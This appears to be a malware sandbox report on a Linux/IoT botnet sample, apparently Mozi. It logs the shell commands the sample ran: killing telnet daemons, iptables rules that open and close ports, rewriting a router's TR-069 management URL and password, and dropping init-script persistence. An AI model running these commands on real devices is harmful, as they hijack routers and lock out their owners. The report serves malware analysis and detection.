Source: /usr/bin/killall (PID: 4603)	File opened: /proc/385/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/144/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/386/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/145/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/146/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3546/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3546/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/147/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3303/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3545/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/148/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/149/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3543/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/822/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/822/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3308/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3308/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3429/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3429/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/47/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/48/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/48/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/49/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/150/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/271/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/151/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/152/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/153/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/395/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/396/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/154/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/155/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/156/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/1017/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/157/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/158/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/159/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3432/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3432/cmdline			Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/MGuvcs6Ocz (PID: 4601)	Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4635)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4669)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4672)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4706)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4733)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 44343 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4754)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4770)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4787)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4894)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4912)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4916)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4919)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4923)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4930)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4940)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4967)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4990)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5015)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5043)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5067)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5095)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5119)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5126)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5129)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5135)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5159)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5218)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5221)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5227)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5257)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5287)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 7723 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5297)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5302)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT"			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 5328)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT"			Jump to behavior

Executes the "iptables" command used for managing IP filtering and manipulation

Source: /bin/sh (PID: 4637)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4671)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4674)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4715)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4739)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4758)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4776)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4795)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4898)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4918)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4921)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4949)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4975)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4999)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5024)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5051)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5077)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5103)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5124)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5128)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5131)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5142)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5220)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5223)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5236)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5267)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5295)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5299)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5309)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5337)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT			Jump to behavior

Reads system information from the proc file system

Source: /tmp/MGuvcs6Ocz (PID: 4626)

Reads from proc file: /proc/stat

Jump to behavior

Sample tries to set the executable flag

Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /usr/networks (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)			Jump to behavior

Writes ELF files to disk

Source: /tmp/MGuvcs6Ocz (PID: 4599)

File written: /usr/networks

Jump to dropped file

Writes shell script files to disk

Source: /tmp/MGuvcs6Ocz (PID: 4599)	Shell script file created: /etc/rcS.d/S95baby.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	Shell script file created: /etc/init.d/S95baby.sh			Jump to dropped file

Samples exit code indicates no error despite standard error output

Source: submitted sample

Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 4 (Illegal instruction) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories

Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/S95baby.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/mountall.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/checkfs.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/umountnfs.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/mountkernfs.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/checkroot-bootclean.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/mountnfs-bootclean.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/bootmisc.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/checkroot.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/hwclock.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/hostname.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/mountdevsubfs.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/mountall-bootclean.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/init.d/mountnfs.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /usr/bin/gettext.sh			Jump to dropped file
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /usr/sbin/alsa-info.sh			Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 47166 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 42672 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 56268 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 56268
Source: unknown	Network traffic detected: HTTP traffic on port 53656 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53656 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53656 -> 37215

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/MGuvcs6Ocz (PID: 4582)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4599)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4622)	Queries kernel information via 'uname':			Jump to behavior
Source: /sbin/modprobe (PID: 4641)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 4850)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 4877)	Queries kernel information via 'uname':			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: kvm-test-1-run.sh.8.dr	Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: functions.sh0.8.dr	Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm.sh.8.dr	Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_pid=$!
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr	Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.8.dr	Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.8.dr	Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: functions.sh0.8.dr	Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: functions.sh0.8.dr	Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh0.8.dr	Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: functions.sh0.8.dr	Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm.sh.8.dr	Binary or memory string: --qemu-args|--qemu-arg)
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: functions.sh0.8.dr	Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: functions.sh0.8.dr	Binary or memory string: specify_qemu_cpus () {
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-ppc64
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.8.dr	Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-ppc64)
Source: functions.sh0.8.dr	Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm-recheck-rcu.sh.8.dr	Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_append qemu-cmd
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_vcpus () {
Source: functions.sh0.8.dr	Binary or memory string: # qemu-args already contains "-smp".
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr	Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.8.dr	Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: functions.sh0.8.dr	Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh0.8.dr	Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.8.dr	Binary or memory string: --qemu-cmd)
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate qemu -append arguments
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu builddir
Source: functions.sh0.8.dr	Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh0.8.dr	Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.8.dr	Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-i386
Source: functions.sh0.8.dr	Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-x86_64
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu () {